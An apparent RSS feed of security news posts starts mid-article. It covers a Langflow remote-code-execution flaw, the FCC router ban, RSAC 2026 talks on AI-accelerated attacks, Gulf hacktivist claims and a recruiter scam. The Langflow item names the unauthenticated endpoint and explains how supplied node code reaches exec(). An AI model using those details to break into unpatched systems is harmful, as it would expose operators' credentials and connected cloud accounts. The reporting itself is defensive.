This rapid turnaround indicates that the window between vulnerability disclosure and active network scanning is now measured in hours, rather than days or weeks. Researchers noted that AI workloads are frequently targeted because they process high-value data and provide software supply chain access, often before comprehensive security measures are fully implemented.

## Technical details of CVE-2026-33017

Langflow is a widely used low-code framework for building and deploying AI agents. The vulnerability, CVE-2026-33017, originates in the `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint, which is designed to allow users to build public flows without authentication.

According to the Langflow GitHub advisory, if a user supplies the optional "data" parameter, the endpoint processes the provided flow data instead of the stored flow data from the local database. If this input contains arbitrary Python code within node definitions, the application passes the code directly to the `exec()` function without sandboxing. This mechanism grants unauthenticated remote code execution (RCE) to anyone who can reach the endpoint.

Langflow clarified that this issue is distinct from CVE-2025-3248, an earlier vulnerability that was previously utilized to distribute the Flodrix botnet.

The technical advisory for CVE-2026-33017 included specific details, such as the vulnerable endpoint path and the exact code injection mechanism. This transparency, while vital for defenders, provided enough information for unauthorized parties to formulate operational inputs without requiring extensive independent research.

## System impact and remediation

Researchers warn that unauthorized parties who successfully execute arbitrary code via CVE-2026-33017 can extract sensitive configuration data from vulnerable Langflow instances. Because these instances often store API keys and credentials for services like OpenAI, Anthropic, and AWS, exposure can enable lateral movement to connected databases and external cloud environments.

To protect your systems, we recommend the following immediate actions:

* Upgrade immediately: Langflow version 1.9.0 mitigates this vulnerability. System administrators should upgrade to the fixed version as soon as possible.

* Implement runtime detection: Utilize runtime security monitoring to identify unexpected shell execution or anomalous network callbacks originating from AI workloads.

* Segment networks: Isolate AI development frameworks from critical production databases and restrict outbound external access to only necessary, approved endpoints.

* Accelerate response capabilities: Organizations operating on scheduled, delayed patch cycles face an elevated risk during the critical hours following a disclosure. Bridging the gap between disclosure and remediation requires rapid, targeted response procedures.

Securing AI pipelines is a collaborative effort. By taking these steps, security and engineering teams can ensure their organizations continue building innovative applications safely and confidently.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating the Security Impact of the FCC&apos;s Router Ban</title>
        <link>https://security.shortwaves.live/blog/e3921f5e-a7e6-4627-b246-1acfe74e79d9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e3921f5e-a7e6-4627-b246-1acfe74e79d9</guid>
        <pubDate>Fri, 27 Mar 2026 03:14:06 GMT</pubDate>
        <description>The FCC&apos;s recent decision to halt approvals for specific foreign-made routers aims to protect national infrastructure, but industry researchers caution it could complicate hardware replacement cycles. Organizations can maintain strong defensive postures by focusing on operational security fundamentals while the hardware market adapts.</description>
        <content:encoded><![CDATA[
            The Federal Communications Commission (FCC) recently decided to add specific foreign-made routers to its national security risk list. While intended to protect infrastructure, this March 23 policy change introduces complexities that could inadvertently extend the lifecycle of older, less secure hardware for US consumers and small businesses over the long term.

The directive restricts the import of new consumer-grade router models manufactured outside the US. Organizations and consumers can continue using their current devices, and retailers may still sell previously approved models. However, the FCC will halt approvals for new foreign-made consumer routers, though it will review exemption requests as needed. The agency based this decision on findings from a White House-convened interagency body, which concluded that these devices present unacceptable national security risks.

## Assessing the national security context

The FCC documented concerns that unauthorized parties could introduce backdoors or tamper with routers to conduct mass surveillance, expose sensitive data, establish botnets, and gain unauthorized access to critical networks. According to the agency, security gaps in foreign-made routers have allow intellectual property theft and network disruption. They specifically referenced the Volt Typhoon, Flax Typhoon, and Salt Typhoon security incidents as examples of events involving foreign-made equipment.

Currently, the vast majority of small office/home office (SOHO) and commercial-grade routers used in the US are manufactured internationally. Rebecca Krauthamer, CEO and co-founder of QuSecure, notes that supply chain risks are genuine, particularly at the national security level. The FCC's restriction focuses on limiting geopolitical exposure and reliance on foreign-controlled components, extending beyond device-level vulnerabilities.

"We are seeing a broader shift toward sovereign and trusted technology stacks in higher-security environments," Krauthamer explains, noting that the origin of infrastructure components is a meaningful consideration when sensitive data is involved.

## Potential side effects on hardware lifecycles

The heavy reliance on imported routers introduces questions about whether the restriction might prompt users to hold onto older, out-of-support devices. Krauthamer observes that while the policy does not mandate immediate replacement, it complicates future procurement. Many businesses rely on routers that have been in place for a decade or more, sitting directly in the critical path of their network traffic. Upgrading this infrastructure could soon involve a more constrained, potentially more expensive market with longer procurement cycles.

Jim Needham, senior managing director at FTI Consulting, explains that businesses might retain outdated equipment well beyond normal replacement cycles, which can weaken overall security postures. Since most routers require periodic replacement to maintain current security standards and keep pace with hardware advancements, the restriction could increase costs and cause operational friction. Because the ruling is prospective, however, these concerns apply primarily to future planning.

## Prioritizing operational security fundamentals

Several security researchers point out that device vulnerabilities are rarely tied directly to manufacturing origin. Instead, risk typically stems from operational gaps, such as default credentials, delayed patch management, and exposed management interfaces.

Jason Soroko, senior fellow at Sectigo, notes that unauthorized parties leverage these vulnerabilities across both domestic and international hardware alike. He cautions against focusing solely on hardware origin rather than maintenance rigor, which could misdirect attention away from the more pervasive issue of administrative oversight.

For contrast, the European Union addresses device security through its Cyber Resilience Act. This legislation requires manufacturers selling connected devices in Europe to meet mandatory cybersecurity requirements. Including secure defaults, vulnerability disclosure, and ongoing software support—regardless of where the hardware was built.

## Navigating future equipment replacements

Currently, the FCC's restriction serves as a forward-looking measure. The practical impact will surface as existing equipment reaches end-of-life and organizations enter a constrained replacement market. Pieter Arntz, a researcher at Malwarebytes, observed only one US-made router, Starlink—currently available in the consumer category affected by the FCC's policy.

The core challenge for the industry is whether the lack of domestic alternatives will spur new investment in US manufacturing or result in prolonged use of aging hardware. The outcome will depend heavily on how the FCC manages its exemption process. In the meantime, security teams can best protect their environments by focusing on rigorous operational hygiene: applying firmware updates promptly, disabling unnecessary remote management interfaces, and strictly controlling administrative credentials.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evolving Defense Methodologies and AI Automation at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/d4044e73-7f44-4f68-81f7-4c2aee40272e</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/d4044e73-7f44-4f68-81f7-4c2aee40272e</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:50 GMT</pubDate>
        <description>An analysis of security developments discussed at RSAC 2026, focusing on the acceleration of AI-driven threat methodologies and the necessary shift toward automated, human-validated defensive workflows. The findings emphasize the importance of verifiable software supply chains and deliberate attribution strategies.</description>
        <content:encoded><![CDATA[
            The RSAC 2026 Conference in San Francisco opened today with a notable shift in international cooperation and the dynamics of automated security operations. Following the withdrawal of U.S. federal agencies, including the FBI and NSA, a response to the conference appointing former CISA Director Jen Easterly as CEO—European cybersecurity leaders have assumed a more prominent role. This transition aligns with a critical period where the speed of unauthorized operations is beginning to surpass traditional, manual defense capabilities, driven largely by the broader availability of artificial intelligence.

Discussions this morning prioritized "vibe coding," a term Dr. Richard Horne of the UK’s National Cyber Security Centre used to describe rapid, AI-assisted software generation. While these tools offer an alternative to the historically vulnerable manual coding process, they simultaneously lower the barrier for generating new software that can propagate unintended vulnerabilities at scale. SANS researchers presented supporting data today indicating that AI now forms the foundation of modern threat methodologies. Malicious actors are utilizing AI models to identify zero-day vulnerabilities in production software for as little as $116 in token costs. This economic shift means advanced discovery techniques are no longer exclusive to well-funded nation-states.

## The acceleration of automated operations

The technical gap between unauthorized access methods and defensive response is widening. Current estimates indicate that AI-driven operations proceed approximately 47 times faster than manual processes. For example, campaigns attributed to the Chinese state-sponsored group GTG 1002 show reconnaissance and lateral movement running at 90% automation. Under these conditions, a compromised credential can result in full administrative control of a cloud environment in under ten minutes.

This acceleration requires organizations to reevaluate incident handling, particularly in operational technology (OT) environments where visibility is often limited. A recent energy sector disruption in Poland demonstrated that without comprehensive OT logging, investigators cannot reliably determine whether a facility failure resulted from a targeted cyber event or a mechanical issue.

Defenders are also managing reputational risks generated by politically motivated threat actors. Iran-aligned groups, including Nasir Security, have applied sophisticated public relations tactics to overstate their operational impact today. By targeting smaller engineering and construction contractors within the supply chain, these groups exfiltrate legitimate internal documents and present them as evidence of unauthorized access at major energy organizations like Dubai Petroleum. The material impact on the primary targets remains negligible, but the psychological effect creates uncertainty. Similarly, groups like the 313 Team use the ambiguity of denial-of-service claims to maintain visibility in the news cycle.

Alongside high-level geopolitical shifts, senior professionals face targeted recruitment fraud. Threat actors impersonating Palo Alto Networks recruiters have spent the last several months executing highly personalized LinkedIn-based social engineering campaigns against executives. The methodology involves manufacturing a bureaucratic hurdle, informing the candidate that their resume failed an automated applicant tracking system (ATS) check—and directing them to a "third-party expert" who charges up to $800 for resume optimization. This campaign leverages the complexity of modern hiring processes to extract fees, demonstrating that the human element remains a primary vector for manipulation even as technical threats become more automated.

## Implementing human-in-the-loop defense

For security teams, these developments necessitate a transition toward proactive, automated validation. In the software supply chain, relying on standard bills of materials (SBOMs) is no longer sufficient. Organizations need to request verifiable proof of how software is built and implement automated patching cycles to match the speed of AI-generated threat methodologies. Regarding AI-assisted defense, experts agreed today that while open-source tools like Protocol SIFT can compress a two-week investigation into 15 minutes, human analysts must remain the final decision makers. Current AI lacks the contextual awareness to reliably interpret evidence, and a confident but incorrect verdict including an AI tool can waste critical hours during an active security incident.

Strategic guidance on public attribution is also evolving. Panelists cautioned against attributing incidents and nation-states as a method of diverting responsibility. While identifying a sophisticated adversary might seem advantageous for public relations, it frequently extends the news cycle and introduces insurance complications, such as "act of war" exclusions. Legal experts advise maintaining a strict "investigation ongoing" stance rather than offering a "no comment." This approach helps the organization control the narrative without making probabilistic claims that could invite secondary actions from the threat actors.

Looking toward the implementation of the EU Cyber Resilience Act in late 2027, the gap between government policy and private sector implementation remains a point of friction. Former NSA directors noted today that the absence of a unified federal data privacy framework or major cyber legislation in the U.S. continues to complicate defensive synchronization. While the thresholds for kinetic military responses to cyber incidents remain at the discretion of the presidency, the day-to-day responsibility for defense rests on private organizations. These entities must secure their data, their supplier ecosystems, and the AI tools utilized to build their infrastructure.

Significant gaps remain in understanding how autonomous agents will interact within OT environments and the full vulnerability footprint of "vibe coding." However, adopting accelerated, human-in-the-loop defensive workflows provides a viable path forward in an environment where the speed of unauthorized operations is no longer limited by manual interaction.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating the technical impact and claims of Iran-aligned threat actors in the Gulf region</title>
        <link>https://security.shortwaves.live/blog/a33b5920-c628-4c84-8e2b-33a1eda53cc7</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/a33b5920-c628-4c84-8e2b-33a1eda53cc7</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:50 GMT</pubDate>
        <description>While politically motivated threat groups aligned with Iran claim to have caused widespread disruption in the Gulf region, technical evidence indicates their material impact remains limited. This analysis examines how these groups use supply chain compromises and public relations tactics to overstate their access, and outlines how security teams can protect their infrastructure.</description>
        <content:encoded><![CDATA[
            Since the onset of recent geopolitical conflict, hard evidence shows that politically motivated, Iran-aligned threat actors have had limited verifiable impact in the Gulf region, despite their widely publicized claims.

Whenever a major geopolitical event occurs, both financially motivated threat actors and the cybersecurity community increase their activity. Malicious cyber activity reliably follows major headlines, prompting security researchers to monitor for rising threats with each news cycle. Researchers track this activity, providing a secondary layer of data to the unfolding events.

The recent conflict involving Iran follows this pattern. Data from Bitdefender indicates that since February 28, the day of the ayatollah's assassination—the rate of unauthorized email campaigns directed at Gulf countries rose by an average of 130%. This activity surged immediately, stayed elevated, and at its peak reached nearly four times its pre-war rate. The measurable increase in activity is clear.

A rise in activity, however, does not automatically translate to a proportional security impact. Security researchers maintain varying assessments of how much risk Iran-aligned threat groups present. When evaluating hard evidence, analysts have found a modest material impact resulting from this anticipated surge.

## Case study: Nasir Security

There is a notable gap between what many Iran-aligned groups claim to accomplish and their verifiable technical impact.

The group known as "Nasir Security", which has aligned itself with Hezbollah and the Alawite ethnic group in Syria—illustrates this pattern. After an initial appearance in October 2025 and a subsequent pause, the group resumed activity on March 10. In the following two weeks, the group claimed to have compromised three Middle Eastern oil and gas companies: Dubai Petroleum in the United Arab Emirates (UAE), CC Energy in Oman, and Al Safi, a company operating gas stations in Saudi Arabia and the wider region.

While these claims appear severe on the surface, technical analysis reveals a different reality. The group vastly overstated its access. "The group is attacking [related] supply chain vendors involved in engineering, safety, and construction," explains Resecurity COO Shawn Loveland.

The logic behind this methodology is straightforward. "Contractors' digital identity information is a typical 'low-hanging fruit,' making them an easy target for business email compromise (BEC) and account takeover (ATO)," Loveland notes. "The actors target contractors, as they may store various engineering documentation and internal files during collaboration with energy companies on their projects. That data is used as a 'shiny object' to claim a breach of the energy company itself."

Nasir Security has accessed and exposed legitimate internal documents, but not from the primary targets. In the case of Dubai Petroleum, Resecurity’s analysis indicates the group falsely claimed to have exfiltrated more than 413GB of data from the company. Instead, the group obtained a smaller set of authentic internal reports, maps, and technical schemes from a third-party contractor. While organizations must remain vigilant against these documents being used in future spear-phishing campaigns, the primary goal of the release was to fabricate legitimacy for the group's public claims.

The objective of these campaigns centers heavily on psychological impact. "The actors attempted to capitalize on the authentic documents (stolen from a third party) and the complexity of investigating the point of compromise, which can be time-consuming, leaving the audience in uncertainty," Loveland states. "Such tactics are widely used by threat actors to plant misleading narratives."

## Verifying high-profile claims

Not all politically motivated threat groups leave behind verifiable evidence, such as downloadable data sets. Analysts often find it challenging to verify claimed activity because many lower-level groups rely on methods that are difficult to definitively disprove or are open to broad interpretation.

For example, threat actors frequently claim denial-of-service (DoS) disruptions against websites that actively block automated uptime checks. Pascal Geenens, vice president of cyber threat intelligence at Radware, explains that "'Defacement' can mean anything including a full website compromise and posting a picture in a comment section and sharing the direct link. System compromise claims similarly run the gamut, including genuinely sensitive intrusions and publicly exposed cameras or unprotected IoT dashboards."

The "313 Team" serves as an example of an Iran-aligned group leveraging this ambiguity. The group recently claimed DoS shutdowns of government and military services in Bahrain and Kuwait. Public reporting indicates both governments experienced minor disruptions, but the incidents either lacked the impact 313 Team claimed or were traced to other threat groups.

"with hacktivist activity, the claim is part of the attack itself," says Justin Moore, senior manager of threat intelligence for Palo Alto Networks' Unit 42. Unit 42 tracked a surge of incident claims at the start of the conflict that lacked verifiable evidence but still generated public concern.

"The narrative that they are operating everywhere is critical to the psychological aspect of their activity, keeping the looming potential threat of attack by them in the news cycle," Moore says. "For an organization, the challenge is managing the reputational fog of war that these groups intentionally create the moment they post on Telegram."

As a baseline for evaluating risk, Geenens notes that groups believed to operate as proxies for a nation-state carry more weight in their claims than self-proclaimed anonymous channels. For instance, Handala, widely assessed to be a false flag operation for Iran's Ministry of Intelligence and Security (MOIS)—is the operation most frequently associated with concrete, verifiable cyber activity in March.

## Evaluating the threat scene

Security researchers maintain different perspectives on the severity of the risk these aligned groups pose to organizational infrastructure.

Matt Hull, vice president of cyber intelligence and response at NCC Group, suggests organizations should prepare for more severe outcomes. "While many hacktivist actions are indeed noisy and designed for psychological effect, we have observed a significant shift toward destructive and high-consequence operations," Hull says. He points to groups targeting critical infrastructure and deploying wipers. He also highlights the role of Iran's reported "Electronic Operations Room" (EOR) in coordinating proxy activities.

"The establishment of the Electronic Operations Room (EOR) has synchronized hacktivist groups, allowing them to act as a force multiplier for state objectives," Hull states. "Even if an individual attack seems minor, the cumulative effect creates a massive drain on defensive resources and provides a smoke screen for more sophisticated state-sponsored actors to move undetected."

Loveland offers a more measured assessment of the current situation. "In fact, none of the Iran-linked, pro-Iranian groups (including Handala) or state-sponsored groups are making any meaningful impact on the Iran conflict, as confirmed by numerous independent assessments and our threat analysis," he states. "Iran and its proxies are orchestrating such campaigns on behalf of groups like 'Nasir Security' to sow uncertainty and create the optics of cyberattacks."

To protect operations against these methodologies, security teams should focus on securing vendor and supply chain access. Implementing strict identity controls and multi-factor authentication mitigates the risk of the business email compromise and account takeover tactics these groups rely upon. Additionally, establishing clear communication protocols helps organizations effectively navigate the reputational uncertainty these threat actors attempt to create.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Former NSA Directors Discuss Policy Thresholds for Cyber Operations at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/a712dbd3-36f4-442e-b3e7-295bdc860614</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/a712dbd3-36f4-442e-b3e7-295bdc860614</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:50 GMT</pubDate>
        <description>A panel of four former National Security Agency directors at RSAC 2026 examined US strategy on state-level cyber operations, the thresholds for military response, and the current state of public-private collaboration in cybersecurity.</description>
        <content:encoded><![CDATA[
            cyber incidents, what crosses the "red line" and justifies a kinetic military response?

That was a central question posed to four former National Security Agency (NSA) directors and US Cyber Command leaders, who evaluated the US government's current cybersecurity strategy during a keynote panel at the RSAC 2026 Conference in San Francisco on Tuesday.

The keynote, titled "Inside Offensive Cyber: Lessons from Four NSA Directors," featured Tim Haugh, Paul Nakasone, Mike Rogers, and Keith Alexander. Alexander was appointed by former President Barack Obama to establish and lead the US Cyber Command. He was succeeded in the post by Rogers, Nakasone, and Haugh, respectively.

The panel followed the release of President Donald Trump's cyber strategy earlier this month, which prioritized offensive capabilities and deterrence. In a military context, offensive cyber operations cover a range of activities. This can include disrupting threat actor infrastructure and conducting surveillance against adversaries, tactics the US has frequently been accused of using against nations such as China. It also encompasses incidents like Stuxnet, which caused significant physical disruption to Iran's nuclear program and has been attributed to the US and Israel, though neither government has formally confirmed involvement.

The 50-minute discussion, moderated by venture capitalist Ted Schlein, covered how the US approach to active cyber operations has evolved from a highly classified concept to a publicly acknowledged strategy. The panelists discussed how the NSA formed the foundation for US military cyber capabilities, the increasing role of the private sector in national defense, and the premise that active capabilities are required to protect the country.

Alexander noted that early detractors of the US moving into offensive cyber operations argued against the Internet becoming a domain for international conflict. "It already is," he said. "Because it is, we have to be the best at it, because our nation is the most digitized nation in the world."

While the panelists generally supported the use of active cyber operations, two of the primary focal points of the discussion were the definition of the "red line" where a cyber incident might prompt kinetic military force—a response the Obama administration formally reserved the right to use in 2011—and whether the current federal government is adequately prioritizing cybersecurity.

## Determining thresholds for response

During the panel, Schlein asked how government officials determine the exact threshold for cyber incidents that reach a critical level of severity.

Nakasone approached the question directly. "Whatever the president says [the red line] is, that's it " he said. "That's the determination, and we can all think what it is, but he's the one that determines whether or not we're going to take some type of distinct action based upon this."

Rogers expanded on this process, noting that during his time working with President Obama, he advocated for establishing specific criteria for when a kinetic response might be appropriate, such as when a cyber incident directly causes a loss of human life.

Addressing the operational mechanics of responding to adversarial actions, Haugh explained that commanders aim to "give options to our policymakers." This involves presenting varying levels of response and their associated risks, allowing decision-makers to select a course of action they are comfortable authorizing.

Alexander emphasized that commanders "need to give the president and the National Security Council flexibility to respond." He argued against rigid rules that eliminate context, noting there may be scenarios where the president decides that launching a physical military response to a cyber incident is not the most strategic course of action, even if the incident meets predefined criteria. Consequently, Alexander advised against Congress codifying these response policies into law, stating, "you don't want Congress legislating something that they don't really understand."

## Government involvement and industry collaboration

Schlein later asked the panel, "Does this country care that much about cyber?" 

The question arrives amid significant structural changes in the federal government. The Cybersecurity and Infrastructure Security Agency (CISA) has recently faced massive layoffs and forced reassignments, and the Cyber Safety Review Board was effectively shuttered shortly after Trump's inauguration. At this year's RSAC Conference, the US government had effectively zero official presence, a sharp contrast to previous years. Federal agencies abruptly pulled out of the event following the hiring of former CISA Director Jen Easterly as RSAC CEO in January.

The panelists offered varying perspectives on the current state of federal cybersecurity prioritization. Alexander took a diplomatic stance on the workforce, stating, "I think the key players in cyber continue to do what they need to do and train, get ready and do their operation. … My experience is they're out there working just as hard as they ever were and they're progressing."

Rogers offered a more direct critique of the current administration's approach to cybersecurity policy.

"I see a private sector that is very network owners that are very energized and focused. I see a government that's unwilling to expend political capital to really drive fundamental change in cyber," Rogers said. "And it's a reflection of the fact that, politically, we are so divided and as a society, we are so divided. Think about it, we're the largest economy in the world. We don't have a single federal data privacy framework. We don't have a single major piece of cyber legislation, and compare that with the rest of the Five Eyes as examples."

Rogers noted that the current environment "frustrates the hell out of me personally," pointing to a distinct lack of cooperation between the federal government and the commercial cybersecurity industry. "We need political leadership synchronized with the private sector to get where we need to go," he said. "And neither can do it by themselves. It just isn't there."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>SANS 2026: Top five emerging threat methodologies and defensive strategies</title>
        <link>https://security.shortwaves.live/blog/d2f8d56a-3042-4f39-bbb6-c038b7258d9a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/d2f8d56a-3042-4f39-bbb6-c038b7258d9a</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:49 GMT</pubDate>
        <description>At the RSAC 2026 Conference, SANS researchers detailed five ways threat actors are integrating artificial intelligence into their operations. The findings emphasize the need for enhanced operational technology visibility, verifiable supply chain data, and AI-supported defensive workflows to maintain organizational security.</description>
        <content:encoded><![CDATA[
            Every year, SANS Institute researchers present top threat methodologies at the RSAC Conference. The 2026 presentation in San Francisco marked a shift in the threat environment: artificial intelligence now underpins all five key areas.

"We would be lying to you if we pointed out a trend in attacks that did not involve AI," SANS president Ed Skoudis explained to the audience during a keynote session. "That is just where we are in the industry." 

## AI-generated zero-days and shifting costs

Historically, discovering zero-day vulnerabilities was a resource-intensive process limited to well-funded, state-sponsored groups. Joshua Wright, SANS Institute faculty fellow and senior technical director, notes that AI has fundamentally changed this cost structure. Independent researchers have recently identified zero-day vulnerabilities in widely deployed production software for as little as $116 in AI token costs. This represents a massive reduction from the millions of dollars previously required to find and validate these vulnerabilities.

"Attackers were already faster than us," Wright said. "AI has made the gap unbridgeable at our current pace."

To adapt, organizations must increase their defensive cadence. Wright advises implementing automated patching, refining validation frameworks, and adopting AI-supported defense tools to match the speed of incoming threats.

## Supply chain risks and third-party exposure

Over the past year, two-thirds of organizations experienced a software supply chain security incident. Wright reported a measurable increase in third-party involvement in unauthorized access events, alongside a surge in malicious packages published to open-source registries.

For example, the Shai-Hulud worm infected over a thousand open-source packages and exposed 14,000 credentials across 487 organizations. In a separate event, a China-affiliated group maintained unauthorized access to the Notepad++ update infrastructure for six months, selectively distributing backdoors to targets in the energy, finance, government, and manufacturing sectors.

"Your attack surface is not the software you chose. It is the entire ecosystem of suppliers behind it," Wright said.

Organizations need to plan for supplier compromises before they occur. This means moving beyond standard software bills of materials to demand verifiable proof of how software is built. Security teams should also evaluate every update channel and developer tool as a potential third-party risk.

## Operational technology (OT) complexity and logging gaps

Robert Lee, SANS Institute fellow and Dragos CEO, discussed a growing accountability crisis in operational technology environments. Following an OT incident, critical network activity logs and diagnostic evidence frequently evaporate or are entirely unavailable due to limited infrastructure visibility.

During a December 2025 incident involving Poland's distributed energy resources, investigators confirmed a disruption had occurred. However, a lack of OT monitoring meant they had no visibility into what the threat actor did inside the systems following the initial unauthorized access.

In another instance, a state-level actor targeted a facility that had no visibility into its own infrastructure. A month later, the facility exploded. Investigators still cannot definitively state whether the destruction was the result of a targeted security event or an industrial accident.

"Governments are not going to be comfortable not knowing what happened in their critical infrastructure and why someone died," Lee said. "That scenario is unacceptable, and it is already happening."

With agentic AI now operating in OT environments, Lee warned that organizations must prioritize network visibility immediately, rather than waiting for a critical failure to force the issue.

## Artificial intelligence in digital forensics and incident response

Organizations deploying AI for digital forensics and incident response (DFIR) without strict training, validation frameworks, and investigative discipline introduce significant risk into their processes. Heather Barnhart, head of faculty and senior forensics expert at the SANS Institute, explained that AI currently lacks the ability to interpret evidence contextually the way a human analyst does.

When an AI tool renders a confident but incorrect verdict, it consumes valuable time and resources during an active response scenario.

"Most breaches don't fail because of tools," Barnhart said. "They fail at decision points. AI cannot be the decision point." 

Barnhart also noted that threat actors are targeting unmonitored vectors like AI notetaking applications, expanding the organizational digital footprint well beyond traditional networks. To manage this, trained analysts must retain decision-making authority at every stage of an investigation.

## Autonomous defense and accelerating response

Security researchers estimate that AI-driven operations move 47 times faster than manual approaches. A threat actor can now take a compromised credential and establish full administrative control in an AWS environment in less than 10 minutes.

A recent campaign documented by Anthropic, tracked as "GTG 1002" and attributed to a Chinese state-sponsored group, targeted over 30 government and financial entities. The group used AI to automate up to 90% of the operation, managing reconnaissance and lateral movement largely without human intervention.

"They have their artificial intelligence," Lee said. "Now we build ours."

To close the speed gap, Lee pointed to Protocol SIFT, an open-source initiative including the SANS Institute. The system uses AI and organize defensive workflows, surface data, and coordinate tools, while leaving validation and decision-making to human analysts.

"The goal is to accelerate analysts, not replace them, and early results suggest that the model can significantly compress response times," Lee said.

During a recent test involving a sophisticated two-week incident scenario, an analyst used Protocol SIFT to complete the entire investigation in under 15 minutes. The workflow included identifying the malicious software, mapping unauthorized movements, aligning tactics, techniques, and procedures (TTPs) to known frameworks, and determining the appropriate remediation steps. Coordinating across the global security community and empowering defenders with these accelerated tools provides the necessary edge against automated threats.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat Actors Impersonate Palo Alto Networks Recruiters in Employment Fraud Campaign</title>
        <link>https://security.shortwaves.live/blog/e12912e6-d037-40c3-a096-d814508fe32f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/e12912e6-d037-40c3-a096-d814508fe32f</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:49 GMT</pubDate>
        <description>Unauthorized actors are targeting senior-level professionals with a sophisticated social engineering campaign that mimics the Palo Alto Networks recruitment process. By understanding this methodology and recognizing manufactured bureaucratic barriers, organizations and candidates can better safeguard their professional identities and financial security.</description>
        <content:encoded><![CDATA[
            Since August of last year, threat actors have conducted a series of targeted social engineering campaigns aimed at senior-level professionals. By impersonating recruiters from Palo Alto Networks, these unauthorized parties seek to establish trust and ultimately defraud candidates under the guise of the hiring process.

Researchers at Palo Alto Networks’ Unit 42 have monitored this activity over the past seven months. According to a recently published threat report, the campaign relies heavily on data gathered including LinkedIn to craft highly personalized communications.

"The specific attack vector uses social engineering and manufacture a bureaucratic barrier regarding the candidate's curriculum vitae (CV) and push the candidate toward taking actions such as reformatting their resumes for a fee," Unit 42 senior manager Justin Moore explained.

Unit 42 has documented multiple reports of this methodology. The outreach typically incorporates flattering language, specific career milestones from the targeted professionals' LinkedIn profiles, and legitimate corporate logos within email signatures to simulate authenticity.

If the sequence proceeds, the targeted candidates are instructed to pay a fee ranging from $400 to $800 to clear an administrative hurdle. The goal is to deceive professionals into believing they are advancing in a genuine recruitment process while extracting financial payments.

## Recruitment fraud methodology

The threat actors initiate contact via emails that appear as legitimate outreach from Palo Alto Networks representatives. This initial stage is designed to build rapport with the candidate.

During this phase, the unauthorized parties use psychological tactics, expressing admiration for the candidate's work history. By referencing specific career milestones scraped from public professional networks, they create the impression that the company has been actively monitoring the candidate’s trajectory for a specific role.

Once engagement is established, the individuals manufacture a crisis to halt the supposed recruitment process. They falsely notify the candidate that their resume failed to pass the company's applicant tracking system (ATS). An ATS is a standard online tool used to evaluate resumes for formatting, structure, and keyword optimization before a human review.

"This psychological tactic increases the urgency and willingness of the victim to comply with the attacker's offer of 'executive ATS alignment,'" Moore noted.

The "recruiter" then introduces a purported third-party expert who offers tiered pricing to resolve the formatting issue. The fraudulent packages include an "executive ATS alignment" for $400, a "leadership positioning package" for $600, and an "end-to-end executive rewrite" for $800.

"In reported incidents, the 'recruiter' then implies that the 'review panel' has already begun, and that the candidate needs to update their CV within a set timeframe," Moore wrote. "The 'expert' then communicates that they can deliver the CV within only a matter of hours, which is within the ostensible review window."

This artificial sense of urgency is designed to pressure the candidate into paying for the unnecessary service. Unit 42 has not publicly disclosed whether any reporting individuals completed the payments.

## Maintaining vigilance in hiring

Recruitment fraud causes immediate financial harm to targeted individuals and can affect the reputation of the impersonated organizations. Similar social engineering campaigns have been documented across the industry to increase the success rate of malicious outreach. For instance, North Korean threat groups, including Lazarus, frequently utilize fraudulent job recruitment operations—such as the known "Dream Jobs" campaigns—to gather intelligence and support unauthorized activities.

These campaigns disrupt legitimate hiring processes. As Moore explained, they succeed by weaponizing "the complexity of modern hiring by manufacturing artificial bureaucratic barriers and high-pressure review windows to solicit fees." He confirmed that Palo Alto Networks remains committed to a transparent hiring process and will never require candidates to pay for resume optimization services.

Any professional receiving employment communications that establish a sense of financial urgency or direct them to a paid third-party service should treat the interaction as a fraudulent attempt to exploit their professional ambitions.

If an individual encounters this specific campaign, Unit 42 recommends ceasing all communication immediately and reporting the event to Palo Alto Networks at infosec(at)paloaltonetworks(dot)com. Additionally, candidates should flag the offending profiles on LinkedIn and secure their professional, social media, and email accounts by updating passwords and enabling multifactor authentication (MFA) to safeguard their digital identity.

About the Author
Elizabeth Montalbano is a contributing freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. She has previously worked as a full-time journalist in Phoenix, San Francisco, and New York City, and currently resides in Portugal.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Navigating the risks of public threat actor attribution</title>
        <link>https://security.shortwaves.live/blog/cfff76e4-fcbb-41cf-9485-c1fe9df1fcf1</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/cfff76e4-fcbb-41cf-9485-c1fe9df1fcf1</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:48 GMT</pubDate>
        <description>Security leaders at RSAC 2026 evaluated the complexities of public threat actor attribution. While identifying the source of a security incident can provide valuable context, definitive public statements carry distinct risks for an affected organization&apos;s communication strategy and risk management.</description>
        <content:encoded><![CDATA[
            RSAC 2026 CONFERENCE – San Francisco – Questions about threat actor attribution, including the methodology behind it and the strategic reasons to delay public statements, require careful consideration from security teams and legal counsel.

Attribution is the process of identifying the responsible party for a security incident. Depending on the methodology and available evidence, researchers might determine that a specific threat group gained unauthorized access to an organization's network. In other cases, analysts identify a "cluster," which connects patterns of activity without linking a threat actor or nation-state to that activity with complete certainty. Security vendors frequently use custom naming taxonomies to track these threat groups, such as Salt Typhoon or Sandworm.

The decision-making process becomes more complex when organizations use these internal identifiers as public signifiers to share research or communicate about an active threat.

